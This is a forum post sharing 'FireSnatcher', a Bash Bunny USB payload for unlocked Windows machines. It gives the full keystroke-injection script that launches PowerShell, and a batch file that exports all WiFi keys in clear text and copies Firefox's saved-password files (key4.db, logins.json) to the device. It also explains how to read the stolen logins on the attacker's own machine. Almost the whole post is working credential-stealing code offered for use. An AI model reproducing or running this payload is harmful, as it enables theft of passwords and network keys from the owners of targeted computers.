KarrotKak3 Posted April 24, 2022 Posted April 24, 2022 Greetings. This is my First Payload written for the Bash Bunny. https://github.com/KarrotKak3/FireSnatcher.git # Props: saintcrossbow & 0iphor13 - I used their work for examples # Full Description # ---------------- # Attacks an Unlocked Windows Machine # Payload targets: # - All WiFi creds # - Firefox Saved Password Database # # PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC # Files # ----- # - payload.txt: Starts the attack. All configuration contained in this file. # - FireSnatcher.bat: Worker that grabs Creds # KNOWN ISSUES # --------------- # Loot is saved in Payloads/switch#/loot CODE: Payload.txt # Title: FireSnatcher # Description: Copies Wifi Keys, and Firefox Password Databases # Author: KarrotKak3 # Props: saintcrossbow & 0iphor13 # Version: 1.0.2.0 (Work in Progress) # Category: Credentials # Target: Windows (Logged in) # Attackmodes: HID, Storage # Full Description # ---------------- # Attacks an Unlocked Windows Machine # Payload targets: # - All WiFi creds # - Firefox Saved Password Database # # PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC # Delays to Allow Powershell Time to Open and to Give Attack time to Run # HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT # %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE # Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins # KNOWN ISSUES # --------------- # Loot is saved in Payloads/switch#/loot # Files # ----- # - payload.txt: Starts the attack. All configuration contained in this file. # - FireSnatcher.bat: Worker that grabs Creds # Setup # ----- # - Place the payload.txt and FireSnatcher.bat in Payload folder # - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) # - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility # LEDs # ---- # Magenta: Initial setup – about 1 – 3 seconds # Single yellow blink: Attack in progress # Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed # Options # ------- # Name of Bash Bunny volume that appears to Windows (BashBunny is default) BB_NAME="BashBunny" # Setup # ----- LED SETUP # Attack # ------ ATTACKMODE HID STORAGE Q DELAY 500 LED ATTACK Q DELAY 100 Q GUI r Q DELAY 100 Q STRING powershell Start-Process powershell Q ENTER Q DELAY 7000 Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" Q ENTER Q DELAY 8000 Q STRING EXIT Q ENTER sync LED FINISH Q DELAY 1500 shutdown now FireSnatcher.bat mkdir %~dp0\loot\%COMPUTERNAME% cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear C: cd \D %appdata%\mozilla\firefox\profiles\ cd %appdata%\mozilla\firefox\profiles\*.default-release\ copy key4.db %~dp0\loot\%COMPUTERNAME% copy logins.json %~dp0\loot\%COMPUTERNAME% ## ## Usage: Make Files Payload.txt and FireSnatcher.bat containing above code ## Copy Both files to either Payloads\{switch1 or switch2} ## ## Loot will be copied to .\payloads\{switch}\loot instead of .\loot As Always, I am not Responsible for what you do with this payload. KarrotKak3
KarrotKak3 Posted April 24, 2022 Author Posted April 24, 2022 HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT # %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE # Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
Recommended Posts
Archived
This topic is now archived and is closed to further replies.